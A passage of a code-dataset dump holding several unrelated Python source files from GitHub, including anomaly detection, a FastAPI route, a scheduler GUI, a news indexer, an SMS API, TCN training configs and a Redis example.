etc.)\n# '''\n#\n# anom[\"false_positives\"] = 0\n# anom[\"false_negatives\"] = 0\n# anom[\"true_positives\"] = 0\n# anom[\"fp_sequences\"] = []\n# anom[\"tp_sequences\"] = []\n# anom[\"num_anoms\"] = len(anom[\"anomaly_sequences\"])\n#\n# E_seq_test = eval(anom[\"anomaly_sequences\"])\n#\n# if len(E_seq) > 0:\n#\n# matched_E_seq_test = []\n#\n# for e_seq in E_seq:\n#\n# valid = False\n#\n# for i, a in enumerate(E_seq_test):\n#\n# if (e_seq[0] >= a[0] and e_seq[0] <= a[1]) or (e_seq[1] >= a[0] and e_seq[1] <= a[1]) or \\\n# (e_seq[0] <= a[0] and e_seq[1] >= a[1]) or (a[0] <= e_seq[0] and a[1] >= e_seq[1]):\n#\n# anom[\"tp_sequences\"].append(e_seq)\n#\n# valid = True\n#\n# if i not in matched_E_seq_test:\n# anom[\"true_positives\"] += 1\n# matched_E_seq_test.append(i)\n#\n# if valid == False:\n# anom[\"false_positives\"] += 1\n# anom[\"fp_sequences\"].append([e_seq[0], e_seq[1]])\n#\n# anom[\"false_negatives\"] += (len(E_seq_test) - len(matched_E_seq_test))\n#\n# else:\n# anom[\"false_negatives\"] += len(E_seq_test)\n#\n# return anom\n\n#####################################\n# Function was created by CO Boulder student, Shawn Polson\n# Adjusted for this project by improving outputs and better choices of parameters by eliminating hardcodes of variables\n\ndef detect_anomalies(ts, normal_model, ds_name, var_name, alg_name, window_size = 30, batch_size=70, smoothing_perc=0.05,\n p=0.25,outlier_def='dynamic', num_stds=2, ndt_errors=None,\n plot_save_path=None, data_save_path=None):\n \"\"\"Detect outliers in the time series data by comparing points against a \"normal\" model.\n Inputs:\n ts [pd Series]: A pandas Series with a DatetimeIndex and a column for numerical values.\n normal_model [pd Series]: A pandas Series with a DatetimeIndex and a column for numerical values.\n ds_name [str]: The name of the time series dataset.\n var_name [str]: The name of the dependent variable in the time series.\n alg_name [str]: The name of the algorithm used to create 'normal_model'.\n Optional Inputs:\n outlier_def [str]: {'std', 'errors', 'dynamic'} The definition of an outlier to be used. Can be 'std' for [num_stds] from the data's mean,\n 'errors' for [num_stds] from the mean of the errors, or 'dynamic' for nonparametric dynamic thresholding\n Default is 'std'.\n num_stds [float]: The number of standard deviations away from the mean used to define point outliers (when applicable).\n Default is 2.\n ndt_errors [list]: Optionally skip nonparametric dynamic thresholding's 'get_errors()' and use these values instead.\n plot_save_path [str]: The file path (ending in file name *.png) for saving plots of outliers.\n data_save_path [str]: The file path (ending in file name *.csv) for saving CSVs with outliers.\n Outputs:\n time_series_with_outliers [pd DataFrame]: A pandas DataFrame with a DatetimeIndex, two columns for numerical values, and an Outlier column (True or False).\n Optional Outputs:\n None\n Example:\n time_series_with_outliers = detect_anomalies(time_series, model, 'BatteryTemperature', 'Temperature (C)',\n 'ARIMA', 'dynamic', plot_path, data_path)\n \"\"\"\n\n X = ts.values\n Y = normal_model.values\n outliers = pd.Series()\n errors = pd.Series()\n time_series_with_outliers = pd.DataFrame({var_name: ts, alg_name: normal_model})\n time_series_with_outliers['Outlier'] = 'False'\n column_names = [var_name, alg_name, 'Outlier'] # column order\n time_series_with_outliers = time_series_with_outliers.reindex(columns=column_names) # sort columns in specified order\n\n # Start a progress bar\n widgets = [progressbar.Percentage(), progressbar.Bar(), progressbar.Timer(), ' ', progressbar.AdaptiveETA()]\n progress_bar_sliding_window = progressbar.ProgressBar(\n widgets=[progressbar.FormatLabel('Outliers (' + ds_name + ')')] + widgets,\n maxval=int(len(X))).start()\n\n\n # Define outliers using JPL's nonparamatric dynamic thresholding technique\n if outlier_def == 'dynamic':\n progress_bar_sliding_window.update(int(len(X))/2) # start progress bar timer\n outlier_points = []\n outlier_indices = []\n if ndt_errors is not None:\n smoothed_errors = ndt_errors\n else:\n smoothed_errors = get_errors(X, Y,window_size, batch_size, smoothing_perc)\n time_series_with_outliers['errors'] = smoothed_errors\n \n # These are the results of the nonparametric dynamic thresholding\n E_seq, anom_scores = process_errors(X, smoothed_errors,window_size, batch_size, p)\n progress_bar_sliding_window.update(int(len(X)) - 1) # advance progress bar timer\n\n # Convert sets of outlier start/end indices into outlier points\n for anom in E_seq:\n start = anom[0]\n end = anom[1]\n for i in range(start, end+1):\n time_series_with_outliers.at[ts.index[i], 'Outlier'] = 'True'\n outlier_points.append(X[i])\n outlier_indices.append(ts.index[i])\n outliers = outliers.append(pd.Series(outlier_points, index=outlier_indices))\n \n # Plot anomalies\n ax = ts.plot(color='#192C87', title=ds_name + ' with ' + alg_name + ' Outliers', label=var_name, figsize=(14, 6))\n normal_model.plot(color='#0CCADC', label=alg_name, linewidth=1.5)\n if len(outliers) > 0:\n print('Detected outliers (' + ds_name + '): ' + str(len(outliers)))\n outliers.plot(color='red', style='.', label='Outliers')\n ax.set(xlabel='Time', ylabel=var_name)\n pyplot.legend(loc='best')\n\n # Save plot\n if plot_save_path is not None:\n plot_dir = plot_save_path[:plot_save_path.rfind('/')+1]\n if not os.path.exists(plot_dir):\n os.makedirs(plot_dir)\n pyplot.savefig(plot_save_path, dpi=500)\n\n pyplot.show()\n pyplot.clf()\n\n # Save data\n if data_save_path is not None:\n data_dir = data_save_path[:data_save_path.rfind('/')+1]\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n time_series_with_outliers.to_csv(data_save_path)\n\n return time_series_with_outliers\n","repo_name":"Isaacburmingham/multivariate-time-series-anomaly-detection","sub_path":"Algorithm Modeling Functions/nonparametric_dynamic_thresholding.py","file_name":"nonparametric_dynamic_thresholding.py","file_ext":"py","file_size_in_byte":22546,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"38"}
+{"seq_id":"4681900095","text":"from typing import List\n\nfrom fastapi import APIRouter, Body, Depends, BackgroundTasks\nfrom pydantic import conint\nfrom sqlalchemy.orm import Session\n\nfrom src.question_service import question_service\nfrom .db.session import get_db\nfrom .schemas import Question\n\nrouter = APIRouter()\n\n\n@router.get('/', tags=['Root'])\nasync def root():\n return {'message': '200 OK'}\n\n\n@router.post(\n '/',\n tags=['Question'],\n response_model=List[Question],\n summary=\"Get quiz questions\"\n)\ndef get_question(\n *, db: Session = Depends(get_db),\n questions_num: conint(gt=0) = Body(1, embed=True),\n background_tasks: BackgroundTasks\n):\n background_tasks.add_task(\n question_service.get_and_save_questions,\n db=db,\n count=questions_num\n )\n\n return question_service.find(\n db=db,\n limit=questions_num\n )\n","repo_name":"MRainbowM/test_bewise","sub_path":"src/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"5102965794","text":"# imports\n\nimport tkinter as tk\nimport subprocess\nimport schedule\nimport time\nimport threading\nimport datetime\n\n\nclass GUI:\n def __init__(self):\n self.root = tk.Tk()\n self.root.title(\"DomoLazeriai scrap APP. By IamGuber.\")\n \n # info log\n\n self.log = tk.Text(self.root, height=10, width=50)\n self.log.pack()\n \n # push button\n\n self.button = tk.Button(self.root, text=\"Start scrap\", command=self.start_function)\n self.button.pack()\n\n # push button2\n\n self.button = tk.Button(self.root, text=\"Start email\", command=self.start_function2)\n self.button.pack()\n \n # schedule the Start button to be clicked every day by clock\n\n schedule.every().day.at(\"06:00\").do(self.start_function)\n\n # schedule the Start button2 to be clicked every day by clock\n\n schedule.every().day.at(\"09:00\").do(self.start_function2)\n\n\n def start_function2(self):\n self.log.insert(tk.END, \"\\nStarting email sending...\\n\")\n\n # start email file sending\n\n try:\n subprocess.Popen([\"python\", \"/Users/voisk/Desktop/SCRAPING APP/mail_sending.py\"])\n self.log.insert(tk.END, \"Email send successfully.\\n\" f\"{datetime.datetime.now()}\")\n except Exception as e:\n self.log.insert(tk.END, f\"Error sending email file: {str(e)}\\n\")\n \n\n def start_function(self):\n self.log.insert(tk.END, \"\\nStarting scrap function...\\n\")\n\n # start scrap file \n\n try:\n subprocess.Popen([\"python\", \"/Users/voisk/Desktop/SCRAPING APP/scrap.py\"])\n self.log.insert(tk.END, \"Scrap file started successfully.\\n\" f\"{datetime.datetime.now()}\")\n except Exception as e:\n self.log.insert(tk.END, f\"Error starting scrap file: {str(e)}\\n\")\n\n\n def run(self):\n\n # start the scheduler in a new thread\n\n schedule_thread = threading.Thread(target=self.schedule_loop, daemon=True)\n schedule_thread.start()\n \n # start the GUI\n\n self.root.mainloop()\n \n\n def schedule_loop(self):\n\n # run the scheduler loop in the background\n\n while True:\n schedule.run_pending()\n time.sleep(1)\n\n\n# create and run the GUI\n\ngui = GUI()\ngui.run()","repo_name":"IamGuber/Scrap-APP","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"24825096294","text":"import json\r\n\r\nimport pandas\r\nfrom pre_processor import DocTokenizer\r\nfrom dictionary import Dictionary\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport pickle\r\nimport glob\r\nimport os\r\nfrom mongoengine import connect\r\nfrom model.news import NewsModel\r\n\r\ndoc_tokenizer = DocTokenizer()\r\ndata_set = '../IR-project-data-phase-3-100k'\r\n\r\nconnect('IREngine', host=\"mongodb://localhost:27017\")\r\n\r\n\r\n# def doc2file(doc_id):\r\ndef to_db():\r\n idx = 0\r\n for filename in glob.glob(os.path.join(data_set, '*.csv')):\r\n df = pandas.read_csv(filename, encoding='utf_8')\r\n\r\n for inn in range(df.shape[0]):\r\n\r\n idx += 1\r\n print('saving' + str(idx))\r\n doc = df.loc[inn, :]\r\n content = doc_tokenizer.clean_html(doc['content'])\r\n publish_date = doc['publish_date']\r\n title = doc['title']\r\n url = doc['url']\r\n summary = doc['summary']\r\n if type(summary) is float:\r\n summary = ' '\r\n meta_tags = json.loads(doc['meta_tags'])\r\n thumbnail = doc['thumbnail']\r\n if type(thumbnail) is float:\r\n thumbnail = 'https://www.bvfd.com/wp-content/uploads/2015/12/placeholder.jpg'\r\n if type(title) is float:\r\n title = \"خبر\"\r\n news = NewsModel()\r\n news.meta_tags = meta_tags\r\n news.thumbnail = thumbnail\r\n news.url = url\r\n news.content = content\r\n news.publish_date = publish_date\r\n news.summary = summary\r\n news.title = title\r\n news.news_id = idx - 1\r\n news.save()\r\n\r\n\r\ndef get_news_by_id(doc):\r\n return NewsModel.objects(news_id=doc)\r\n\r\n\r\ndef indexing():\r\n print(\"Creating index.txt...\")\r\n dictionary = Dictionary()\r\n to_db()\r\n doc2term = dict()\r\n docId = 0\r\n for filename in glob.glob(os.path.join(data_set, '*.csv')):\r\n print(\"Creating Index of \", filename)\r\n df = pandas.read_csv(filename, encoding='utf_8')\r\n for doc in df['content']:\r\n # total_tokens = np.zeros(df.shape[0]) #zeapf and heapf law\r\n # total_terms = np.zeros(df.shape[0]) #zeapf and heapf law\r\n # doc2term_file = open('./doc2term.txt', 'w', encoding='utf_8')\r\n print('Indexing doc ', docId)\r\n positionals = doc_tokenizer.get_tokens(doc)\r\n\r\n # if i != 0:\r\n # total_tokens[i] = total_tokens[i - 1] #zeapf and heapf law\r\n terms = []\r\n # doc2term_file.write(str(i) + ' => ')\r\n doc2term[docId] = list()\r\n\r\n for positional in positionals:\r\n # dictionary.add_term_to_dictionary(positional, i)\r\n # total_tokens[i] = total_tokens[i] + len(positional[1]) #zeapf and heapf law\r\n # terms.append((positional[0], len(positional[1]))) #zeapf and heapf law\r\n # doc2term_file.write(str(positional[0]) + ':' + str(len(positional[1])) + ',')\r\n doc2term[docId].append((str(positional[0]), len(positional[1])))\r\n if dictionary.existed_in_dictionary(positional[0]):\r\n dictionary.add_term_to_dictionary(positional, docId)\r\n # temp = dictionary.terms_cf[positional[0]] #zeapf and heapf law\r\n else:\r\n new_posting = list()\r\n new_posting.append((docId, positional[1]))\r\n dictionary.dictionary[positional[0]] = (1, new_posting)\r\n # temp = 0 # zeapf and heapf law\r\n docId += 1\r\n print(\"Done\")\r\n # dictionary.terms_cf[positional[0]] = len(positional[1]) + temp #zeapf and heapf law\r\n # doc2term_file.write('\\n')\r\n\r\n # total_terms[i] = len(dictionary.dictionary.keys())\r\n\r\n # heaps_law(total_tokens, total_terms)\r\n # zipfs_law(dictionary.terms_cf)\r\n # dict = dictionary.get_dictionary()\r\n # print(dictionary.get_dictionary()['ایران'])\r\n\r\n with open('inverted_index_500.pickle', 'wb') as handle:\r\n pickle.dump(dictionary.get_dictionary(), handle, protocol=pickle.HIGHEST_PROTOCOL)\r\n\r\n with open('doc2term_index_500.pickle', 'wb') as handle:\r\n pickle.dump(doc2term, handle, protocol=pickle.HIGHEST_PROTOCOL)\r\n\r\n # with open('./index.txt', 'w', encoding=\"utf_8\") as f:\r\n # for key in sorted(dict.keys()):\r\n # f.writelines([key, \" => \", str(dict[key]), \"\\n\"])\r\n print(\"Don!\")\r\n\r\n\r\ndef fetch_result(doc_list):\r\n # df = pandas.read_csv(data_set)\r\n result = []\r\n for doc_id in doc_list:\r\n # content = df['content'][doc_id]\r\n # content = doc_tokenizer.clean_html(content)\r\n # content = doc_tokenizer.text_normalizer(content)\r\n #\r\n # publish_date = df['publish_date'][doc_id]\r\n # title = df['title'][doc_id]\r\n # url = df['url'][doc_id]\r\n # summary = df['summary'][doc_id]\r\n # if type(summary) is float:\r\n # summary = ' '\r\n # meta_tags = df['meta_tags'][doc_id]\r\n # thumbnail = df['thumbnail'][doc_id]\r\n # if type(thumbnail) is float:\r\n # thumbnail = 'https://www.bvfd.com/wp-content/uploads/2015/12/placeholder.jpg'\r\n # result.append(news)\r\n q = get_news_by_id(doc_id)\r\n print(q)\r\n if len(q) > 0:\r\n nw = q[0]\r\n news = {'content': str(nw.content), 'publish_date': str(nw.publish_date), 'title': str(nw.title), 'url': str(nw.url),\r\n 'summary': str(nw.summary),\r\n 'meta_tags': nw.meta_tags, 'thumbnail': str(nw.thumbnail)}\r\n result.append(news)\r\n else:\r\n return []\r\n return result\r\n\r\n\r\ndef heaps_law(total_tokens, total_terms):\r\n total_tokens = np.log10(total_tokens)\r\n total_terms = np.log10(total_terms)\r\n x = np.linspace(0, total_tokens[len(total_tokens) - 1], 2000)\r\n y = math.log(40, 10) + (1 / 2) * x\r\n plt.plot(total_tokens, total_terms)\r\n plt.plot(x, y, '--')\r\n plt.xlabel('log10 T')\r\n plt.ylabel('log10 M')\r\n plt.title('Heap`s law')\r\n plt.savefig('./plots/heaps.png')\r\n plt.show()\r\n\r\n\r\ndef zipfs_law(terms_cf):\r\n sorted_terms_cf = [(k, terms_cf[k]) for k in sorted(terms_cf, key=terms_cf.get, reverse=True)]\r\n total_cf = []\r\n for k, v in sorted_terms_cf:\r\n total_cf.append(v)\r\n total_cf = np.array(total_cf)\r\n total_cf = np.log10(total_cf)\r\n print(total_cf)\r\n total_ranks = np.arange(len(total_cf))\r\n total_ranks = total_ranks + 1\r\n total_ranks = np.log10(total_ranks)\r\n print(total_ranks)\r\n x = np.linspace(0, total_ranks[len(total_ranks) - 1], 2000)\r\n y = math.log(10000, 10) - x\r\n plt.plot(total_ranks, total_cf)\r\n plt.plot(x, y, '--')\r\n plt.xlabel('log10 rank')\r\n plt.ylabel('log10 cf')\r\n plt.title('Zipf`s law')\r\n plt.savefig('./plots/zipfs.png')\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n # indexing()\r\n # caltest()\r\n to_db()\r\n a = get_news_by_id([10304, 12])\r\n print(get_news_by_id([10304, 12]))\r\n # print(fetch_result([108]))\r\n # doclist = [15]\r\n # result = fetch_result(doclist)\r\n # print(result)\r\n # for r in result:\r\n # print(r['summary'])\r\n","repo_name":"parsareal/News-Search-Engine","sub_path":"TextMinning-master/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":7301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"70843477551","text":"import uuid\nimport phonenumbers\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.generics import get_object_or_404\n\nfrom sms_counter import SMSCounter\n\nfrom .models import SMSMessage, InvalidSMSMessage, SMSMessageStateLog\n\n\nclass VTigerPluginAPI(APIView):\n \"\"\" API to Send SMS \"\"\"\n parser_classes = (JSONParser,)\n permission_classes = (IsAuthenticated,)\n \n def post(self, request, format=None):\n data = request.data\n recipients = data.get(\"to\")\n sms_message = data.get(\"message\")\n \n if not recipients or len(recipients) == 0:\n return Response(\"Recipient(s) missing\", status=status.HTTP_400_BAD_REQUEST)\n \n if not sms_message:\n return Response(\"Message missing\", status=status.HTTP_400_BAD_REQUEST)\n \n result = {\n \"messages\": [],\n \"invalid_numbers\": []\n }\n \n # set bulkId\n bulk_id = None\n if len(recipients) > 1:\n bulk_id = data.get(\"bulkId\", uuid.uuid4())\n result[\"bulkId\"] = bulk_id \n \n counter = SMSCounter.count(data.get(\"message\"))\n \n for recipient in recipients:\n try:\n # this will raise an exception early if number is invalid\n phonenumbers.parse(recipient, None)\n \n m = SMSMessage.objects.create(\n id = data.get(\"messageId\", uuid.uuid4()),\n bulk_id = bulk_id,\n text = data.get(\"message\"),\n recipient = recipient,\n owner = request.user,\n pages = counter[\"messages\"]\n )\n \n result[\"messages\"].append(\n {\n \"to\": str(m.recipient),\n \"submitted\": True,\n \"messageId\": m.id,\n \"smsCount\": m.pages\n }\n ) \n except phonenumbers.phonenumberutil.NumberParseException:\n result[\"invalid_numbers\"].append(recipient)\n raise ValueError(f\"Invalid recipient number: {recipient}\")\n except ValueError as ve:\n InvalidSMSMessage.objects.create(\n text = data.get(\"message\"),\n recipient = recipient,\n user = request.user,\n message = m,\n error_reason = ve\n )\n return Response(result, status=status.HTTP_201_CREATED)\n \nclass SMSReport(APIView):\n \n permission_classes = (IsAuthenticated,)\n \n def get(self, request, messageid, format=None):\n m = get_object_or_404(SMSMessage, id=messageid, user=request.user)\n \n result = {}\n #sucessfully sent\n latest_state = m.status\n if latest_state == SMSMessage.Status.SUCCESS:\n result['sent'] = True\n result['to'] = str(m.recipient)\n result['time'] = latest_state.timestamp\n elif latest_state == SMSMessage.Status.ERROR:\n result['error'] = True\n result['errorReason'] = latest_state.state_reason \n elif latest_state == SMSMessage.Status.FAILED:\n result['failed'] = True\n \n return Response(result)","repo_name":"dedayoa/yeastar-sms-bridge","sub_path":"sms/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"33956801631","text":"import os\nimport glob\nimport torch\nimport torchsummary\nfrom itertools import product\nimport pytorch_lightning as pl\nfrom argparse import ArgumentParser\n\nfrom microtcn.tcn import TCNModel\nfrom microtcn.lstm import LSTMModel\nfrom microtcn.data import SignalTrainLA2ADataset\n\ntorch.backends.cudnn.benchmark = True\n\ntrain_configs = [\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : True,\n \"train_fraction\" : 0.01,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-100\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 5,\n \"causal\" : True,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : True,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-1000\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 5,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 5,\n \"causal\" : True,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-100\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 5,\n \"causal\" : False,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : False,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-1000\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 5,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 5,\n \"causal\" : False,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"TCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 10,\n \"dilation_growth\" : 2,\n \"kernel_size\" : 15,\n \"causal\" : False,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : True,\n \"train_fraction\" : 0.10,\n \"batch_size\" : 32\n },\n {\"name\" : \"LSTM-32\",\n \"model_type\" : \"lstm\",\n \"num_layers\" : 1,\n \"hidden_size\" : 32,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 3,\n \"dilation_growth\" : 60,\n \"kernel_size\" : 5,\n \"causal\" : True,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : True,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32,\n \"max_epochs\" : 60,\n \"train_loss\" : \"l1\"\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 30,\n \"dilation_growth\" : 2,\n \"kernel_size\" : 15,\n \"causal\" : False,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32,\n \"max_epochs\" : 60,\n },\n {\"name\" : \"uTCN-324-16\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 10,\n \"dilation_growth\" : 2,\n \"kernel_size\" : 15,\n \"causal\" : False,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32,\n \"max_epochs\" : 60,\n \"channel_width\" : 16,\n },\n]\n\nn_configs = len(train_configs)\n\nfor idx, tconf in enumerate(train_configs):\n\n #if (idx+1) not in [14]: continue\n # if you only want to train a specific model\n\n parser = ArgumentParser()\n\n # add PROGRAM level args\n parser.add_argument('--model_type', type=str, default='tcn', help='tcn or lstm')\n parser.add_argument('--root_dir', type=str, default='./data')\n parser.add_argument('--preload', action=\"store_true\")\n parser.add_argument('--sample_rate', type=int, default=44100)\n parser.add_argument('--shuffle', type=bool, default=True)\n parser.add_argument('--train_subset', type=str, default='train')\n parser.add_argument('--val_subset', type=str, default='val')\n parser.add_argument('--train_length', type=int, default=65536)\n parser.add_argument('--train_fraction', type=float, default=1.0)\n parser.add_argument('--eval_length', type=int, default=131072)\n parser.add_argument('--batch_size', type=int, default=32)\n parser.add_argument('--num_workers', type=int, default=16)\n\n # add all the available trainer options to argparse\n parser = pl.Trainer.add_argparse_args(parser)\n\n # THIS LINE IS KEY TO PULL THE MODEL NAME\n temp_args, _ = parser.parse_known_args()\n\n print(f\"* Training config {idx+1}/{n_configs}\")\n print(tconf)\n \n # let the model add what it wants\n if temp_args.model_type == 'tcn':\n parser = TCNModel.add_model_specific_args(parser)\n elif temp_args.model_type == 'lstm':\n parser = LSTMModel.add_model_specific_args(parser)\n\n # parse them args\n args = parser.parse_args()\n\n # set the seed\n pl.seed_everything(42)\n\n # only run 60 epochs\n args.max_epochs = 60\n\n # init the trainer and model \n if tconf[\"model_type\"] == 'tcn':\n specifier = f\"{idx+1}-{tconf['name']}\"\n specifier += \"__causal\" if tconf['causal'] else \"__noncausal\"\n specifier += f\"__{tconf['nblocks']}-{tconf['dilation_growth']}-{tconf['kernel_size']}\"\n specifier += f\"__fraction-{tconf['train_fraction']}-bs{tconf['batch_size']}\"\n elif tconf[\"model_type\"] == 'lstm':\n specifier = f\"{idx+1}-{tconf['name']}\"\n specifier += f\"__{tconf['num_layers']}-{tconf['hidden_size']}\"\n specifier += f\"__fraction-{tconf['train_fraction']}-bs{tconf['batch_size']}\"\n\n if \"max_epochs\" in tconf:\n args.max_epochs = tconf[\"max_epochs\"]\n else:\n args.max_epochs = 60\n\n if \"train_loss\" in tconf:\n args.train_loss = tconf[\"train_loss\"]\n specifier += f\"__loss-{tconf['train_loss']}\"\n\n args.precision = 16\n\n args.default_root_dir = os.path.join(\"lightning_logs\", \"bulk\", specifier)\n print(args.default_root_dir)\n trainer = pl.Trainer.from_argparse_args(args)\n\n # setup the dataloaders\n train_dataset = SignalTrainLA2ADataset(args.root_dir, \n subset=args.train_subset,\n fraction=tconf[\"train_fraction\"],\n half=True if args.precision == 16 else False,\n preload=args.preload,\n length=args.train_length)\n\n train_dataloader = torch.utils.data.DataLoader(train_dataset, \n shuffle=args.shuffle,\n batch_size=tconf[\"batch_size\"],\n num_workers=args.num_workers,\n pin_memory=True)\n\n val_dataset = SignalTrainLA2ADataset(args.root_dir, \n preload=args.preload,\n half=True if args.precision == 16 else False,\n subset=args.val_subset,\n length=args.eval_length)\n\n val_dataloader = torch.utils.data.DataLoader(val_dataset, \n shuffle=False,\n batch_size=8,\n num_workers=args.num_workers,\n pin_memory=True)\n\n # create the model with args\n dict_args = vars(args)\n dict_args[\"nparams\"] = 2\n\n if tconf[\"model_type\"] == 'tcn':\n dict_args[\"nblocks\"] = tconf[\"nblocks\"]\n dict_args[\"dilation_growth\"] = tconf[\"dilation_growth\"]\n dict_args[\"kernel_size\"] = tconf[\"kernel_size\"]\n dict_args[\"causal\"] = tconf[\"causal\"]\n if \"channel_width\" in tconf:\n dict_args[\"channel_width\"] = tconf[\"channel_width\"]\n model = TCNModel(**dict_args)\n elif tconf[\"model_type\"] == 'lstm':\n dict_args[\"num_layers\"] = tconf[\"num_layers\"]\n dict_args[\"hidden_size\"] = tconf[\"hidden_size\"]\n model = LSTMModel(**dict_args)\n\n # summary \n torchsummary.summary(model, [(1,65536), (1,2)], device=\"cpu\")\n\n # train!\n trainer.fit(model, train_dataloader, val_dataloader)\n","repo_name":"csteinmetz1/micro-tcn","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8325,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"38"}
+{"seq_id":"74640633391","text":"import redis\n\ntry:\n r = redis.Redis(host='localhost',\n port=6379,\n db=0)\n r.ping() # This will attempt to ping the server, and if successful, you're connected.\n print(\"Connected to Redis\")\n\n r.set('foo', 'bar') # create record\n value = r.get('foo') # read record\n\n print(value) # bar\nexcept redis.ConnectionError:\n print(\"Could not connect to Redis\")\n","repo_name":"Ruslan-Skira/goit_web","sub_path":"module08/lesson02/from_lecture/redis_l.py","file_name":"redis_l.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"29033891744","text":"# Author: Group 23 (Miguel, Akanksha, Dorian)\n# Date: March 12th 2023\n# Purpose: Showcase how to use the DataReceive.py library\n\n\nimport DataReceive # Name of the file containing the bluetooth serial object\nimport time\nimport matplotlib.pyplot as plt\nimport keyboard\nfrom email_setup import *\nfrom processing_funcs import *\nfrom plotting import *\nfrom os import listdir\nfrom os.path import isfile, join\n\n\n# setting clinician email\nclinician_email = 'knighd7@mcmaster.ca' # 'martim96@mcmaster.ca'#'nehetea@mcmaster.ca'\n\n# READ THIS COMMENT OR ELSE THERE WILL BE PROBLEMS\n\n'''Make sure to check the value of bluetoothCommObject.successfullConnect\nThis value will tell you if you're connected or not - please build a contingency plan\nin case connection is not successfully established (whether that is try again or raise some exception\n\nNote: you only need to check if the connection was successfully established at the start as the connection persists as long as the object is alive'''\n\n# Make the bluetooth object that will establish the connect and send back data\n\nbluetoothCommObject = DataReceive.bluetoothTelephone()\nif (bluetoothCommObject.successfullConnect == True):\n print(\"Connection was successfully established \\n\")\nelse:\n print(\"Connection was not successfully established\")\n\n\n# initializing arrays for holding angle data from each direction of the SEBT test for nonoperative leg\nanterior_SEBT_nonop = []\nanterolateral_SEBT_nonop = []\nanteromedial_SEBT_nonop = []\nlateral_SEBT_nonop = []\nmedial_SEBT_nonop = []\nposterolateral_SEBT_nonop = []\nposteromedial_SEBT_nonop = []\nposterior_SEBT_nonop = []\n\n# initializing arrays for holding angle data from each direction of the SEBT test for operative leg\nanterior_SEBT_op = []\nanterolateral_SEBT_op = []\nanteromedial_SEBT_op = []\nlateral_SEBT_op = []\nmedial_SEBT_op = []\nposterolateral_SEBT_op = []\nposteromedial_SEBT_op = []\nposterior_SEBT_op = []\n\n\n# arrays for holding foot center of mass data during each direction of the SEBT test for nonoperative leg\nanterior_CofMs_nonop = []\nanterolateral_CofMs_nonop = []\nanteromedial_CofMs_nonop = []\nlateral_CofMs_nonop = []\nmedial_CofMs_nonop = []\nposterolateral_CofMs_nonop = []\nposteromedial_CofMs_nonop = []\nposterior_CofMs_nonop = []\n\n# arrays for holding foot center of mass data during each direction of the SEBT test for operative leg\nanterior_CofMs_op = []\nanterolateral_CofMs_op = []\nanteromedial_CofMs_op = []\nlateral_CofMs_op = []\nmedial_CofMs_op = []\nposterolateral_CofMs_op = []\nposteromedial_CofMs_op = 